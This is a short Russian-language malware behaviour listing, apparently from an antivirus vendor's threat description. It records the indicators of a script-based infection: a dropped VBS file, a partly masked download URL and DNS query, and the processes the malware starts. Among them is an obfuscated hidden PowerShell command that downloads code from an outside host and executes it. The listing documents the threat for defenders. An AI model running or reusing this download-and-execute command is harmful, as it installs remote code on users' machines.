Техническая информация
- http://f0####64.xsph.ru/download/e3.php
- %TEMP%\opexstl.vbs
- http://f0####64.xsph.ru/download/e3.php
- DNS ASK f0####64.xsph.ru
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\opexstl.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://f0####64.xsph.ru/download/e3.php')' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\opexstl.vbs
- '%WINDIR%\syswow64\cmd.exe' /c %APPDATA%\seriousman.vbs
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'